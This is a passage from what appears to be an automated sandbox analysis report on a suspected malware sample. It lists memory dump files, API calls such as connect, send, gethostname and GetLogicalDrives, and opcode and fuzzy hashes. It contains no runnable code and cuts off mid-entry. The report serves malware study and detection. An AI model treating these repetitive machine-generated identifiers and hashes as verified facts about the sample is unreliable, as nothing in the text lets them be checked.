                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: abfaf12bbc4153f36784ba0b046cdff67a1496ea75182d8b27b09ed3658f566c
                                                              • Instruction ID: 1a7f104c19f85fdbc70bb8fab0a7914abe1981a8f1df503f1400f0fee1960f38
                                                              • Opcode Fuzzy Hash: abfaf12bbc4153f36784ba0b046cdff67a1496ea75182d8b27b09ed3658f566c
                                                              • Instruction Fuzzy Hash: C2D05E22A1A2207B8A316A99BC48C5B6BA8DFC6F20B0A0D5DF84477208D2209C0183F7
                                                              Function 00E5B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00E5B29E,?,00000000,?,?), ref: 00E5B0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00E43C41,00000000), ref: 00E5B0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: 463b56086d810b146f1cea033bf7772ced62e9c7279037ab2bb6fd3714b36377
                                                              • Instruction ID: e68f7d478fb2f8528411beb2756901b1af373277c27dcaf729b99db4af90f5c1
                                                              • Opcode Fuzzy Hash: 463b56086d810b146f1cea033bf7772ced62e9c7279037ab2bb6fd3714b36377
                                                              • Instruction Fuzzy Hash: F301D436304200DBCA205A688884FABB799FF89379F140F64FD78B31E1D726ED548752
                                                              Function 00E44950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00E44AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 0eea15e65e803d0335a82db72c412f7c48d97f0d760382dc3fc5ac52ca5e0206
                                                              • Instruction ID: bed616e09e612f8d19f7bb279955388dd2e599f08d1523b67ed52452c227d52e
                                                              • Opcode Fuzzy Hash: 0eea15e65e803d0335a82db72c412f7c48d97f0d760382dc3fc5ac52ca5e0206
                                                              • Instruction Fuzzy Hash: EF51C0F07047018BE7309F25F94976376E4EF41319F14293CEA8AA66D1E774E884DB12
                                                              Function 0727031C Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 0727040F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416835471.0000000007270000.00000040.00001000.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7270000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: aee7aae838a8a30d9bd5e0c23d7d1c54589420bb132174a3304b853dd4f9563b
                                                              • Instruction ID: 352faa3aec6ea96c2bc4d113f881af03ac05af08dcb722df300561293238fab7
                                                              • Opcode Fuzzy Hash: aee7aae838a8a30d9bd5e0c23d7d1c54589420bb132174a3304b853dd4f9563b
                                                              • Instruction Fuzzy Hash: 0021D3EB27C211BEB56291962B65AFB6B6DE6C7730B308437F403C1501E2F40A0D9132
                                                              Function 0727032E Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE ref: 0727040F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416835471.0000000007270000.00000040.00001000.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7270000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 3ee3b56365cb9b16c9e9688f14ef5a33cde91a11027075de840c4ed0cbca6c9f
                                                              • Instruction ID: b225c5c0f80f481a1f3c58c8b21bc59154cd6445dbe695d91ccff25c64c92a7c
                                                              • Opcode Fuzzy Hash: 3ee3b56365cb9b16c9e9688f14ef5a33cde91a11027075de840c4ed0cbca6c9f
                                                              • Instruction Fuzzy Hash: 7B1148E657D281AFA72242985B559FA7B6DEA8333473044ABF842C3142E3F40509D232
                                                              Function 00E5AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00E5AFD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 7626577a2c48a4ca8d726de2a61bb860ac63b8c118d65032158d3e7998740f84
                                                              • Instruction ID: 3f2a6f8b31d8d50b2242defb70805ed6771a9dadd74a21a1241e53d890dfddb3
                                                              • Opcode Fuzzy Hash: 7626577a2c48a4ca8d726de2a61bb860ac63b8c118d65032158d3e7998740f84
                                                              • Instruction Fuzzy Hash: 1C119670908785D5EB268F18D4027F6B3F4EFD0329F109A18E9D952150F7325AC98BD2
                                                              Function 00E5A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00E5A97F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: 2d9321c9837e7db2c59573ca40839617d82385e90d274fc9d96a2baa6da15b1e
                                                              • Instruction ID: 9674f5dc23a8ab97fc416c44b8566c9579068c556cb017afe227764d042d6f12
                                                              • Opcode Fuzzy Hash: 2d9321c9837e7db2c59573ca40839617d82385e90d274fc9d96a2baa6da15b1e
                                                              • Instruction Fuzzy Hash: 7501A776B007119FC6148F14E845B56B7A5EFC4721F0A8659EA982B361C331AC148BD1
                                                              Function 00E5AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WS2_32(?,00E5B280,00000000,-00000001,00000000,00E5B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00E5AF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: cb5cefe0a019ec232677582182c1f9705dc5c17be113ded68fe1e738c68cc6fb
                                                              • Instruction ID: 57863299faf723474477abbf87539cbcf5f62a8e905ddd711851973bbd6251b3
                                                              • Opcode Fuzzy Hash: cb5cefe0a019ec232677582182c1f9705dc5c17be113ded68fe1e738c68cc6fb
                                                              • Instruction Fuzzy Hash: 57E0EDB6B092216BD654DB18E844AABF369EFC4B21F055E59BC5467204C330AC548BF2
                                                              Function 00E5B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • closesocket.WS2_32(?,00E59422,?,?,?,?,?,?,?,?,?,?,?,w3,01224C60,00000000), ref: 00E5B04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: e48f50a5f563afcc360981e95335417584f101d11603f0435b84d44aede4f4a0
                                                              • Instruction ID: 14fe7a92247283db1d18dcbeb7fc66571866265a026de7d208c7a49b4546e839
                                                              • Opcode Fuzzy Hash: e48f50a5f563afcc360981e95335417584f101d11603f0435b84d44aede4f4a0
                                                              • Instruction Fuzzy Hash: 46D0C23430020197CA249A14C884A57772B7FD0715FA8DF6CE82C4A1D4CB3BCC4B8601
                                                              Function 00DF67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,00DCAF56,?,00000001), ref: 00DF67FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 3c1d202289db0292a9aeb4baed872efe5245275bb227e71251d2b1d76f7019c1
                                                              • Instruction ID: 66806cfb78524afff404ec24cd778485ada8519ee7a2de58543acfda5f00e555
                                                              • Opcode Fuzzy Hash: 3c1d202289db0292a9aeb4baed872efe5245275bb227e71251d2b1d76f7019c1
                                                              • Instruction Fuzzy Hash: 65C012F1209201AFC60C4724D855B2EB6D9DB44255F01491CB04692180EA349450CB16
                                                              Function 00D931D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: a4dbdb41ecd01cb83c4be642480951adefc6c715270b1e7eb7c10ac77b904fee
                                                              • Instruction ID: cf5df70d859998d2fc08cced15b181e0c20d539de8b8c798b18be567186a4d74
                                                              • Opcode Fuzzy Hash: a4dbdb41ecd01cb83c4be642480951adefc6c715270b1e7eb7c10ac77b904fee
                                                              • Instruction Fuzzy Hash: 8631C3B49093159FCB10EFB8C5846AEBBF4BF54308F01896DD898A7344E7349A84CF92
                                                              Function 07250B27 Relevance: .2, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 787eebbdf6aad2621cbf5881870028325fca27caf411ae549bc240a91409d6c1
                                                              • Instruction ID: e769e8be3f4b00c4304c12c93bd1a6e83e8acdc798ab3f0261141ac5db3bafad
                                                              • Opcode Fuzzy Hash: 787eebbdf6aad2621cbf5881870028325fca27caf411ae549bc240a91409d6c1
                                                              • Instruction Fuzzy Hash: D74123FB53C214ADE22295616F94AFB7B6EE7D7330B30846AFC03D6502E2F45A495231
                                                              Function 07250BE1 Relevance: .1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5eb921dcfd18dd33577ac8712bd4e8470c4f1444de69dd2dd356cf2b902c1b6f
                                                              • Instruction ID: 80445a70349d2e6973c21c932138e090d601b7d7fe38e6a0ad19338b4784dd83
                                                              • Opcode Fuzzy Hash: 5eb921dcfd18dd33577ac8712bd4e8470c4f1444de69dd2dd356cf2b902c1b6f
                                                              • Instruction Fuzzy Hash: 3E21B1EB17D104BDA12285A16F54AFB666EE6E7331F308436FC07E2602E2F45E491531
                                                              Function 07250BFE Relevance: .1, Instructions: 142COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89be980a2df9e1a7342ea710fdbcb7377a010b363821119e1176d6b43324fc32
                                                              • Instruction ID: db05e3b695eb53fdef32cd35146865208232bbf2f6133338a1a4483ab65b6971
                                                              • Opcode Fuzzy Hash: 89be980a2df9e1a7342ea710fdbcb7377a010b363821119e1176d6b43324fc32
                                                              • Instruction Fuzzy Hash: 5831F3EB53D104ADE62285A15F246FA6B6EE6D7330B308076FC07D7603E2F45E495131
                                                              Function 07250C29 Relevance: .1, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 693dd6b232039de7f956d8b125eea5a11d9e8f93b9451273fcc41fd598ceafc9
                                                              • Instruction ID: 92d82f964e4a7deee8777e7c5f7eabe545d690ce2f5b9cdbbab995a21aaf412c
